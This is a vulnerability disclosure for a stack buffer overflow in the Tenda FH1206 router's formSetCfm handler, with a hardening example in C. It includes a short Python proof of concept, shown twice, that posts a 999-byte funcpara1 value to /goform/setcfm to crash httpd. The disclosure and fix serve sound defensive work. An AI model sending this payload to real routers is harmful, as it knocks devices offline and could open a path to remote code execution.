Overview

Tenda FH1206 V1.2.0.8(8155)_EN

Affected version

V1.2.0.8(8155)_EN

Vulnerability details

The Tenda FH1206 V1.2.0.8(8155)_EN has a stack-based buffer overflow vulnerability in the formSetCfm function. The v5 (var_funcpara1) variable receives the funcpara1 parameter from the POST request and passes it to the save_list_data function.


Within save_list_data, the value of v5 (var_funcpara1) arrives as a1 and is written into the local v10 array by the statement sprintf(v10, "%s.list%d", a1, v10);. There is no length check before the call, so a funcpara1 value longer than the 64-byte v10 array overwrites the stack beyond it. An attacker can easily cause a denial of service (crashing httpd) or, with carefully crafted overflow data, potentially achieve remote code execution.
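As an added illustration (not code from the firmware or from the advisory author), the following C reconstructs the unchecked sprintf pattern described above beside a bounded replacement. The 64-byte buffer size and the "%s.list%d" format come from the text; the function names, the index value 0 and the 999-byte payload measurement are assumptions made for the example. The vulnerable write is measured rather than performed, so the program shows how far the PoC payload overruns the buffer without corrupting its own stack.

```c
#include <stdio.h>
#include <string.h>

/* Size of the stack array (v10) that the advisory reports as 64 bytes. */
#define LIST_NAME_SIZE 64

/*
 * Number of bytes the unchecked sprintf(v10, "%s.list%d", a1, v10) pattern
 * would emit for a given funcpara1 value, not counting the terminating NUL.
 * The vulnerable firmware performs the write; here it is only measured with
 * snprintf(NULL, 0, ...), so the overflow can be reasoned about safely.
 */
size_t vulnerable_write_length(const char *funcpara1, int index) {
    int n = snprintf(NULL, 0, "%s.list%d", funcpara1, index);
    return n < 0 ? 0 : (size_t)n;
}

/*
 * How many bytes the PoC payload (999 'a' bytes, as in the advisory's request;
 * index 0 is an assumption) would write past the end of the 64-byte buffer,
 * including the NUL terminator.
 */
size_t poc_overflow_bytes(void) {
    static char payload[1000];
    memset(payload, 'a', 999);
    payload[999] = '\0';
    size_t total = vulnerable_write_length(payload, 0) + 1; /* +1 for the NUL */
    return total > LIST_NAME_SIZE ? total - LIST_NAME_SIZE : 0;
}

/*
 * Hardened replacement for the unchecked sprintf: measure first, refuse any
 * value that does not fit together with its NUL, then write with a bounded
 * snprintf. Returns 0 on success, -1 when the input is rejected.
 */
int build_list_name(char *out, size_t out_size, const char *funcpara1, int index) {
    size_t needed = vulnerable_write_length(funcpara1, index);
    if (needed >= out_size)            /* no room left for the NUL terminator */
        return -1;
    snprintf(out, out_size, "%s.list%d", funcpara1, index);
    return 0;
}

int main(void) {
    char name[LIST_NAME_SIZE];
    char longval[200];

    printf("PoC payload overruns v10 by %zu bytes\n", poc_overflow_bytes());

    /* A short, legitimate value fits and is formatted normally. */
    printf("short value: %s\n",
           build_list_name(name, sizeof name, "wifi", 1) == 0 ? name : "(rejected)");

    /* A long value is rejected instead of smashing the stack. */
    memset(longval, 'a', 199);
    longval[199] = '\0';
    printf("long value: %s\n",
           build_list_name(name, sizeof name, longval, 1) == 0 ? name : "(rejected)");
    return 0;
}
```

The check in build_list_name is the one missing from save_list_data: the formatted length is computed before anything is written, and the request is refused when it would not fit. Rejecting over-long funcpara1 values at the request handler (formSetCfm) as well would stop the payload before it reaches the formatting code.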


PoC

```python
# formSetCfm
import requests

ip = '192.168.0.100:80'  # router LAN address and HTTP port
url = f"http://{ip}/goform/setcfm"

# funcname selects save_list_data; funcpara1 is the value copied into the
# 64-byte stack buffer without a length check, so 999 bytes overflows it.
data = {'funcname': 'save_list_data', 'funcpara1': b'a' * 999, 'funcpara2': 'test'}

ret = requests.post(url, data)
```


Additional Information

### Product_version
Tenda FH1206
V1.2.0.8(8155)_EN

### Affected_component
the "formSetCfm" function of /bin/httpd; /bin/httpd

### Attack_vector
Use a simple exploit script, like the following:
```python
# python3
import requests

ip = '192.168.0.100:80'
url = f"http://{ip}/goform/setcfm"
# 999 bytes in funcpara1 exceeds the 64-byte stack buffer in save_list_data
data = {'funcname': 'save_list_data', 'funcpara1': b'a' * 999, 'funcpara2': 'test'}
ret = requests.post(url, data)
```

### Description
Tenda FH1206 V1.2.0.8(8155)_EN was discovered to contain a stack-based buffer overflow vulnerability via the funcpara1 parameter at /goform/setcfm.

### Reference
<https://palm-vertebra-fe9.notion.site/formSetCfm-7d199da0fd0740988a498304905e2dd1>
<https://www.tendacn.com/hk/download/detail-2344.html>